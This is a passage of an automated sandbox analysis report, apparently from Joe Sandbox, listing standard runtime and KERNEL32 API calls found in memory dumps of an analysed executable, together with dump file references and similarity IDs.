                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0925
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E092B
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0961
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0967
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0977
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 127012223-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 003C445E
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C4468
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C447F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 003C44A2
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C44B9
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C44D9
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C44E6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,003C90C1,003C77F5,003C698B), ref: 003C90D8
                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003C90E6
                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003C90FF
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,003C90C1,003C77F5,003C698B), ref: 003C9151
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AFD2407A,?,?,00000000,003E22F7,000000FF,?,003D08F9,?,?,003D08CD,00000000), ref: 003D099E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003D09B0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,003E22F7,000000FF,?,003D08F9,?,?,003D08CD,00000000), ref: 003D09D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C36BC
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C36CF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C3702
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C3718
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C3723
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C2F9D
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C2FB0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C2FE3
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C2FF9
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C3004
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C34F5
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C3508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C353B
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C3551
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C355C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 156189095-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040932D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __getptd_noexit.LIBCMT ref: 00409507
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __amsg_exit.LIBCMT ref: 00409514
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00409344
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00409352
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00409362
                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00409376
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003CA1C3,00000000,?,004230A4,?,?,?,003CA366,00000004,InitializeCriticalSectionEx,003E5BD8,InitializeCriticalSectionEx), ref: 003CA21F
• GetLastError.KERNEL32(?,003CA1C3,00000000,?,004230A4,?,?,?,003CA366,00000004,InitializeCriticalSectionEx,003E5BD8,InitializeCriticalSectionEx,00000000,?,003CA11D), ref: 003CA229
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 003CA251
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleOutputCP.KERNEL32(AFD2407A,00000000,00000000,00000000), ref: 003D6D5B
  • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003D6FB6
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003D6FFE
• GetLastError.KERNEL32 ref: 003D70A1
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
• GetLastError.KERNEL32 ref: 003D8EF2
• __dosmaperr.LIBCMT ref: 003D8EF9
• GetLastError.KERNEL32(?,?,?,?), ref: 003D8F33
• __dosmaperr.LIBCMT ref: 003D8F3A
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 003D9E2C
  • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003D9E64
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003D9E84
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00408BAC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __getptd_noexit.LIBCMT ref: 00409507
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __amsg_exit.LIBCMT ref: 00409514
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00408BCC
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00408BDC
                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00408C0C
Memory Dump Source
• Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3170801528-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000), ref: 003E0536
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000,00000000,?,003D767C,00000000), ref: 003E0542
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003E0508: CloseHandle.KERNEL32(FFFFFFFE,003E0552,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000,00000000), ref: 003E0518
                                                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 003E0552
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003E04CA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003E04F9,003DF319,00000000,?,003D70F5,00000000,00000000,00000000,00000000), ref: 003E04DD
                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000), ref: 003E0567
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 003C9802
                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 003FD4FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407426: std::exception::_Copy_str.LIBCMT ref: 00407441
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 003FD514
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003FD390: std::exception::exception.LIBCMT ref: 003FD3BF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003FD390: __CxxThrowException@8.LIBCMT ref: 003FD3D4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_
                                                                                                                                                                                                                                                                                                  • String ID: LpB
                                                                                                                                                                                                                                                                                                  • API String ID: 758583290-825029884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57c4579a5890c425686cd50170c1af0b7d99fda424955e6261b8de2e866cadb7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16b95c38580a7845e5d69018f6f36455f53e736bb76eff1b0fc8a649951fbcfe
